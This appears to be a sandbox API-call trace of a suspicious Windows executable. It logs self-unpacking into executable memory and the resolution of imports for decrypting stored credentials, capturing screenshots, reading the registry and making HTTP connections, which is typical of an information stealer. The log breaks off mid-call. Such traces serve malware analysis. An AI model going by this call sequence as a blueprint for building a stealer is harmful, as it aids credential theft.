lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.926] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0124.927] lstrlenA (lpString=0x0) returned 0 [0125.252] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0125.253] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0125.253] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0125.253] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0125.253] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0125.253] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0125.253] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0125.253] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0125.253] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x30 [0125.256] Module32First (hSnapshot=0x30, lpme=0x18de8c) returned 1 [0125.257] VirtualAlloc (lpAddress=0x0, dwSize=0x88050, flAllocationType=0x1000, flProtect=0x40) returned 0x210000 [0125.285] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0125.285] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0125.286] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0125.286] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0125.286] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0125.286] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0125.286] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0125.286] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0125.286] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0125.286] SetErrorMode (uMode=0x400) returned 0x0 [0125.286] SetErrorMode (uMode=0x0) returned 0x400 [0125.286] GetVersionExA (in: lpVersionInformation=0x18cdbc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18cdbc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0125.287] VirtualAlloc (lpAddress=0x0, dwSize=0x87200, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0125.327] VirtualProtect (in: lpAddress=0x400000, dwSize=0x8c000, flNewProtect=0x40, lpflOldProtect=0x18de44 | out: lpflOldProtect=0x18de44*=0x2) returned 1 [0125.337] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.342] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0125.342] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0125.342] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0125.342] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0125.342] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0125.342] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0125.342] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0125.342] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0125.342] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0125.343] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0125.343] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileA") returned 0x76d658e5 [0125.343] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0125.343] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentDirectoryA") returned 0x76d6d4f6 [0125.343] GetProcAddress (hModule=0x76d30000, lpProcName="Process32Next") returned 0x76d688a4 [0125.343] GetProcAddress (hModule=0x76d30000, lpProcName="Process32First") returned 0x76d68ae7 [0125.343] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0125.343] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0125.343] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0125.343] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0125.343] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0125.343] GetProcAddress (hModule=0x76d30000, lpProcName="FileTimeToSystemTime") returned 0x76d4542c [0125.344] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0125.344] GetProcAddress (hModule=0x76d30000, lpProcName="GetPrivateProfileSectionNamesA") returned 0x76dba1c9 [0125.344] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileA") returned 0x76d6d53e [0125.344] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileA") returned 0x76d4e2ce [0125.344] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesW") returned 0x76d41b18 [0125.344] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0125.344] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedCompareExchange") returned 0x76d41484 [0125.344] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0125.344] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0125.344] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0125.344] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0125.345] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0125.345] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0125.345] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0125.345] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0125.345] GetProcAddress (hModule=0x76d30000, lpProcName="UnlockFile") returned 0x76d6cf36 [0125.345] GetProcAddress (hModule=0x76d30000, lpProcName="LockFile") returned 0x76d6cf1e [0125.345] GetProcAddress (hModule=0x76d30000, lpProcName="LockFileEx") returned 0x76d6d57c [0125.345] GetProcAddress (hModule=0x76d30000, lpProcName="UnlockFileEx") returned 0x76d6d594 [0125.345] GetProcAddress (hModule=0x76d30000, lpProcName="SetCurrentDirectoryA") returned 0x76d51834 [0125.345] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesExW") returned 0x76d44574 [0125.345] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0125.345] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0125.346] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0125.346] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0125.346] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0125.346] GetProcAddress (hModule=0x76d30000, lpProcName="UnmapViewOfFile") returned 0x76d41826 [0125.346] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathA") returned 0x76d6276c [0125.346] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathW") returned 0x76d5d4dc [0125.346] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageA") returned 0x76d65fbd [0125.346] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0125.346] GetProcAddress (hModule=0x76d30000, lpProcName="GetFullPathNameA") returned 0x76d4e2c1 [0125.346] GetProcAddress (hModule=0x76d30000, lpProcName="GetFullPathNameW") returned 0x76d440d4 [0125.346] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceA") returned 0x76dc433f [0125.347] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceW") returned 0x76d5f7aa [0125.347] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0125.347] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemInfo") returned 0x76d449ca [0125.347] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0125.347] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingA") returned 0x76d45506 [0125.347] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameA") returned 0x76d5b6e0 [0125.347] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0125.347] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0125.347] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0125.347] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0125.347] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0125.347] GetProcAddress (hModule=0x76d30000, lpProcName="TzSpecificLocalTimeToSystemTime") returned 0x76d6066a [0125.348] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0125.348] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoA") returned 0x76d5d5e5 [0125.348] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandle") returned 0x76d453ae [0125.348] GetProcAddress (hModule=0x76d30000, lpProcName="SystemTimeToFileTime") returned 0x76d45a7e [0125.348] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocalTime") returned 0x76d45aa6 [0125.348] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0125.348] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0125.348] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0125.348] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesA") returned 0x76d6287b [0125.348] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0125.348] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0125.349] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0125.349] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0125.349] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0125.349] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0125.349] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0125.349] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0125.349] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDriveStringsA") returned 0x76d4e4dc [0125.349] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0125.349] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesA") returned 0x76d45414 [0125.349] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0125.349] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0125.349] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0125.350] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0125.350] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0125.350] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0125.350] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0125.350] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0125.350] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0125.350] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0125.350] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0125.350] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0125.350] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0125.350] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0125.350] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0125.351] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0125.351] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableW") returned 0x76d489f1 [0125.351] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0125.351] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0125.351] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0125.351] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0125.351] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0125.351] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0125.351] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTime") returned 0x76d45a96 [0125.400] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0125.401] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0125.401] GetProcAddress (hModule=0x76d30000, lpProcName="HeapCreate") returned 0x76d44a2d [0125.401] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0125.401] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0125.401] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0125.401] GetProcAddress (hModule=0x76d30000, lpProcName="SetHandleCount") returned 0x76d4cb29 [0125.401] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0125.401] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0125.401] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0125.401] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0125.401] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0125.401] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0125.401] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0125.401] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0125.401] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0125.401] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0125.402] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0125.402] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0125.402] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0125.402] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0125.402] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0125.402] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSetInformation") returned 0x76d45651 [0125.402] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0125.402] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0125.402] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0125.402] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0125.402] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0125.402] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0125.402] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedExchange") returned 0x76d41462 [0125.402] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedDecrement") returned 0x76d413f0 [0125.402] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0125.402] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0125.402] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0125.477] GetProcAddress (hModule=0x77130000, lpProcName="GetSystemMetrics") returned 0x77147d2f [0125.477] GetProcAddress (hModule=0x77130000, lpProcName="wsprintfA") returned 0x7715ae5f [0125.477] GetProcAddress (hModule=0x77130000, lpProcName="EnumDisplayDevicesW") returned 0x7716e567 [0125.477] GetProcAddress (hModule=0x77130000, lpProcName="CharToOemA") returned 0x77154fee [0125.477] GetProcAddress (hModule=0x77130000, lpProcName="GetDC") returned 0x771472c4 [0125.477] GetProcAddress (hModule=0x77130000, lpProcName="ReleaseDC") returned 0x77147446 [0125.477] GetProcAddress (hModule=0x77130000, lpProcName="GetKeyboardLayoutList") returned 0x77152e69 [0125.477] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0125.477] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0125.477] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0125.478] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0125.478] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0125.478] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0125.478] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0125.478] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0125.478] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0125.478] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0125.478] GetProcAddress (hModule=0x77710000, lpProcName="RegEnumValueA") returned 0x7771cf49 [0125.478] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExA") returned 0x777248ef [0125.479] GetProcAddress (hModule=0x77710000, lpProcName="RegEnumKeyExA") returned 0x77721481 [0125.479] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameA") returned 0x7773a4b4 [0125.479] GetProcAddress (hModule=0x77710000, lpProcName="GetCurrentHwProfileA") returned 0x777511f8 [0125.479] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0125.479] GetProcAddress (hModule=0x77710000, lpProcName="RegGetValueW") returned 0x77720e47 [0125.479] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0125.479] GetProcAddress (hModule=0x77710000, lpProcName="RegGetValueA") returned 0x7771a9dd [0125.479] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExA") returned 0x77724907 [0125.479] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0125.485] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0125.485] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0125.485] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0125.489] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0125.489] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0125.489] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0125.489] GetProcAddress (hModule=0x772f0000, lpProcName="PathMatchSpecW") returned 0x773086f7 [0125.490] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0125.494] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0125.494] GetProcAddress (hModule=0x77550000, lpProcName="CryptUnprotectData") returned 0x77585a7f [0125.494] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x77060000 [0125.495] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleFileNameExA") returned 0x770615bc [0125.495] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcessModules") returned 0x77061408 [0125.496] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleBaseNameA") returned 0x770615a4 [0125.496] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0125.505] GetProcAddress (hModule=0x758d0000, lpProcName="InternetConnectA") returned 0x758f49e9 [0125.505] GetProcAddress (hModule=0x758d0000, lpProcName="HttpOpenRequestA") returned 0x758f4c7d [0125.505] GetProcAddress (hModule=0x758d0000, lpProcName="HttpSendRequestA") returned 0x759618f8 [0125.505] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0125.506] GetProcAddress (hModule=0x758d0000, lpProcName="InternetSetFilePointer") returned 0x7594af16 [0125.506] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0125.506] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoA") returned 0x758ea33e [0125.506] GetProcAddress (hModule=0x758d0000, lpProcName="HttpAddRequestHeadersA") returned 0x758edcd2 [0125.506] GetProcAddress (hModule=0x758d0000, lpProcName="InternetSetOptionA") returned 0x758e75e8 [0125.506] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0125.506] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0125.506] LoadLibraryA (lpLibFileName="gdiplus.dll") returned 0x747f0000 [0125.534] GetProcAddress (hModule=0x747f0000, lpProcName="GdipCreateBitmapFromHBITMAP") returned 0x74826671 [0125.534] GetProcAddress (hModule=0x747f0000, lpProcName="GdipSaveImageToFile") returned 0x748241fd [0125.534] GetProcAddress (hModule=0x747f0000, lpProcName="GdipGetImageEncoders") returned 0x7483228c [0125.534] GetProcAddress (hModule=0x747f0000, lpProcName="GdiplusShutdown") returned 0x748156be [0125.535] GetProcAddress (hModule=0x747f0000, lpProcName="GdiplusStartup") returned 0x74815600 [0125.535] GetProcAddress (hModule=0x747f0000, lpProcName="GdipCloneImage") returned 0x74824bfa [0125.535] GetProcAddress (hModule=0x747f0000, lpProcName="GdipDisposeImage") returned 0x74824cc8 [0125.535] GetProcAddress (hModule=0x747f0000, lpProcName="GdipAlloc") returned 0x74832437 [0125.535] GetProcAddress (hModule=0x747f0000, lpProcName="GdipGetImageEncodersSize") returned 0x74832203 [0125.535] GetProcAddress (hModule=0x747f0000, lpProcName="GdipFree") returned 0x748324b2 [0125.535] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x74d70000 [0125.538] GetProcAddress (hModule=0x74d70000, lpProcName="BCryptDecrypt") returned 0x74d718b8 [0125.538] GetProcAddress (hModule=0x74d70000, lpProcName="BCryptCloseAlgorithmProvider") returned 0x74d7234e [0125.538] GetProcAddress (hModule=0x74d70000, lpProcName="BCryptDestroyKey") returned 0x74d71f40 [0125.538] GetProcAddress (hModule=0x74d70000, lpProcName="BCryptGenerateSymmetricKey") returned 0x74d71fbc [0125.538] GetProcAddress (hModule=0x74d70000, lpProcName="BCryptSetProperty") returned 0x74d720d4 [0125.538] GetProcAddress (hModule=0x74d70000, lpProcName="BCryptOpenAlgorithmProvider") returned 0x74d72d30 [0125.538] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x75420000 [0125.563] GetProcAddress (hModule=0x75420000, lpProcName="atexit") returned 0x7543c544 [0125.563] atexit (param_1=0x210920) returned 0 [0125.564] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18de58 | out: lpSystemTimeAsFileTime=0x18de58*(dwLowDateTime=0xe23e4840, dwHighDateTime=0x1d6d58a)) [0125.564] GetCurrentProcessId () returned 0xaa8 [0125.564] GetCurrentThreadId () returned 0xae8 [0125.564] GetTickCount () returned 0x1151249 [0125.564] QueryPerformanceCounter (in: lpPerformanceCount=0x18de50 | out: lpPerformanceCount=0x18de50*=24573750753) returned 1 [0125.564] GetStartupInfoW (in: lpStartupInfo=0x18ddfc | out: lpStartupInfo=0x18ddfc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18de60, hStdError=0x465d3a)) [0125.564] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.564] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x6c90000 [0125.565] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0125.565] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0125.565] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0125.565] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0125.565] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0125.566] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x214) returned 